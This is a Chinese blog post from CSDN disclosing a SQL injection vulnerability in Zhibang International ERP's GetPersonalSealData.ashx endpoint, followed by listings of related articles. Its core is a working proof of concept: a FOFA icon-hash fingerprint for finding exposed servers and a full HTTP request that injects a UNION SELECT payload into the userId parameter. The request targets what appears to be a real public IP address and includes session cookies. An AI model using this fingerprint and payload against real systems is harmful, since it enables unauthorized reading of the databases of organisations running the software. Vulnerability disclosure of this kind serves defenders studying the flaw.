智邦国际ERP系统存在SQL注入漏洞

于 2024-10-01 12:39:30 发布
阅读量86 收藏
点赞数
文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_77012231/article/details/142669837
版权

漏洞描述

智邦国际ERP系统是一款全面的企业资源规划工具,其主要目标是协助组织实现业务流程自动化和提升效率。此系统具备多种功能模块,包括但不限于财务管理、采办管理、销售操作、库存控制和生产过程管理,都能够满足企业多元化的业务需求。在其GetPersonalSealData.ashx接口,由于未严格验证和过滤用户输入的数据,这些数据被直接插入到构造的SQL查询语句中,导致sql注入漏洞。

漏洞复现

FOFA

icon_hash="-682445886"

POC

GET /SYSN/json/pcclient/GetPersonalSealData.ashx?imageDate=1&userId=1%20union%20select%20@@version-- HTTP/1.1
Host: 36.7.81.248:8
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36 Edg/129.0.0.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cookie: ASPSESSIONIDCCRCSCSS=EAHHDNLBHPKABFEJCNKGNLOJ; ASP.NET_SessionId=tnjrn2ul5p4gfooxgykmweji
Connection: keep-alive

bp

查看数据库版本信息

马船长
关注
天智云智造管理平台 Usermanager.ashx SQL注入漏洞复现
0xSec
06-05 575
天智云智造管理平台 Usermanager.ashx 接口处存在SQL注入漏洞,,未经授权攻击者可通过该漏洞获取数据库敏感信息,进一步利用可获取服务器权限,导致网站处于极度不安全状态。
5pm66YKm5Zu96ZmF ERP downfile.asp 任意文件读取漏洞复现
0xSec
01-04 1189
5pm66YKm5Zu96ZmF ERP downfile.asp 存在任意文件读取漏洞
.NET 漏洞分析 | 某ERP系统存在SQL注入
ahhacker86的专栏
06-28 657
此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他方面。
智邦国际ERP系统帮助企业控制成本
jyzw18727的博客
04-01 2288
智邦国际ERP成本管理提高企业竞争力   在市场竞争异常激烈的今天,企业市场竞争力越来越大,加强成本管理,在企业经营战略中已处于极其重要的核心地位。在信息化的条件下,企业运用ERP系统来管理成本并有效达到控制成本的目的,是企业求得生存和发展的毕竟之路之路。那么究竟该如何利用ERP系统来达到成本控制的目的呢?   一、    材料成本 材料成本是最主要的,智邦国际erp可按照生产需求提出原
智邦国际ERP系统好不好?
weixin_33949359的博客
09-28 8261
物料成百上千,每天出入库频繁,单据收发量大,录入不及时,数据很紊乱,加班加点忙不完?物料编码不统一,手工单据不可靠,业务交接很混乱?同个物料相见不相识,要么没编号,要么找不到,车间现场堆积如山,生产过程频频中断?呆料废料占用大量资金,赚钱订单做成赔钱买卖?……生产车间物料管理问题,可谓说都说不完,也因此,成为很多企业管理层的心病!智邦国际制造业ERP系统全方位生产车间物料管理,能够让企业对症下药,...
智邦国际ERP系统有哪些优势和特点?
03-14 2562
关于ERP系统,相信大家都已经耳熟能详了,其中较为的常见的ERP系统像SAP、oracal、智邦国际这些等等,为了让大家能够更快更好的了解ERP系统,下面我们就以智邦国际ERP系统为例,一起来具体的了解一下ERP系统吧! ...
智邦国际ERP软件实施成功的七大步骤
soywp51的博客
03-28 3341
ERP系统实施指的是利用ERP软件将企业用户的管理制度与信息化技术相结合的一种过程,为解决用户的实际管理问题而提供的服务。ERP系统实施往往需要在管理系统和实际工作之间寻求妥协,具有相当大的难度,因此有些企业ERP实施是失败的。所以要对ERP实施做足充分的准备工作,智邦国际小编在此准备了实施流程借以参考。   第一步:公司决策层确认大方向 每家企业都有各自的管理流程,很少能与ERP系统完全一
深挖智邦国际生产制造ERP系统的现状
jyzw18727的博客
09-26 818
企业的运营管理,涉及到销售、人资、财务等方方面面,实属不易,但是生产制造型企业,又是在一般贸易型企业的基础上,加了一个难度系数,无论是车间的进度控制,还是产品的清点质检过程,都给企业的管理增加不了难度
智邦国际制造业ERP系统生产看板有哪些功能?
mysecrets的博客
04-12 1342
现代社会,信息科技发展太快,常让我们很难分清科幻和现实。平昌冬奥会闭幕式上炫酷的《北京八分钟》,向全球展示了充满科技元素的中国形象,让我们如同看了一场科幻电影,然而,那就是张艺谋导演和团队,利用人工智能和人类演员共同完成的现场表演。而现在,这样的炫酷科技,同样也应用到了工厂车间。智邦国际ERP系统智能生产看板,让制造业行业企业的各个部门、岗位角色,只需一个屏幕,一键操作,就能对生产进度了如指掌,堪...
智邦国际ERP的官方API对接参考项目
08-08
智邦国际 ERP 添加API订单
智邦国际ERP系统在生产制造业的应用
06-15
ERP系统在生产制造业的应用
智邦国际ERP生产管理系统:数字化风口下的顺势而为-综合文档
05-24
智邦国际ERP生产管理系统:数字化风口下的顺势而为
部标主动安全(ADAS+DMS)对接说明
谁念西风独自凉
09-27 655
上一篇介绍了,这里说一下如何对接主动安全附件服务器。流媒体的对接主要牵扯到4个方面:(1)平台端:业务端系统,包含前端呈现界面。(2)JT/T808网关:部标设备接入网关,这个是非常重要的,是设备与平台进行数据交换的桥梁,流媒体相关的指令操作也必须依赖它完成。(3)部标视频机:符合JT/T808协议的车载视频机器。(4)流媒体服务:符合苏标、粤标、川标、陕标协议的主动安全附件服务,接收文件流,并存储。
Splashtop 加入 Microsoft 智能安全协会
SplashtopLoki的博客
09-27 541
Splashtop 的 Foxpass Cloud RADIUS 可提供精确的访问控制,保护 Wi-Fi 网络免受未授权用户和网络攻击的侵害,Foxpass 因其流畅的用户体验和强大的安全性而广受认可。MISA 由独立软件供应商(ISV)和托管安全服务提供商(MISA)组成,他们将其解决方案与 Microsoft 安全技术集成,以更好地保护我们共同的客户免受日益增长的网络威胁。MISA 的使命是提供行业领先的智能安全解决方案,在安全威胁不断增加的情况下,以 AI 的速度和规模保护组织安全
【注册/登录安全分析报告:孔夫子旧书网】
weixin_46641057的博客
09-27 1202
孔夫子网简称孔网,创建于2002年,是大型的二手旧货、古旧图书和商品交易平台,是传统文化行业结合互联网而搭建的C2C平台,是有传统文化价值的旧货市场。网站主要板块是书店区和拍卖区。网站秉承“网罗天下图书,传承中华文明”的理念,致力于发掘、抢救、保护和传播中国传统文化资源。作为旧古书二手市场平台的“独角兽”企业, 技术实力也应该不错,但采用的还是老一代的图形验证码已经落伍了, 用户体验一般,容易被破解, 一旦被国际黑客发起攻击,将会对老百姓形成骚扰,影响声誉。
Spring Security 是一个强大的和高度可定制的身份验证和访问控制框架。它是 Spring 项目家族的一员,用于构建安全的 Java 应用程序。
最新发布
weixin_64446270的博客
09-27 1326
Spring Security 是一个强大的和高度可定制的身份验证和访问控制框架。它是 Spring 项目家族的一员,用于构建安全的 Java 应用程序。Spring Security 提供了全面的安全服务,从基本的登录认证到复杂的访问控制,几乎涵盖了所有与安全相关的需求。
网络编程(5)——模拟伪闭包实现连接的安全回收
m0_63086198的博客
09-26 1051
new_session通过bind绑定时,new_session的计数就会加一,所以在bind后,new_session的生命周期和新构造函数的生命周期相同,因为新生成的函数对象引用了new_session(new_session通过值传递的方式被复制构造函数使用)。,但是通过bind操作,将new_session作为数值传递给bind函数,而bind函数返回的函数对象内部引用了该new_session所以引用计数增加1,这样保证了new_session不会被释放。今天学习如何通过C11智能指针构造伪。
从《GTA5》的反外挂斗争看网络安全的重要性
@云安全小杜
09-26 674
本文将探讨《GTA5》在对抗外挂过程中遇到的挑战,特别是当游戏开发者试图增强游戏安全性时所遭受的DDoS攻击,并从中提炼出对于网络安全的一些启示。然而,随着游戏人气的增长,一些不法分子开始利用技术手段制作并销售外挂程序,这些程序可以让使用者在游戏中获得不公平的优势,从而破坏了游戏环境。请注意,以上内容是基于假设的情景编写的技术分析文章,实际案例可能涉及更多的细节和技术层面的问题。《GTA5》与外挂之间的斗争提醒我们,在享受数字世界带来的便利的同时,也需要时刻警惕潜在的安全风险,并积极采取措施加以防范。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值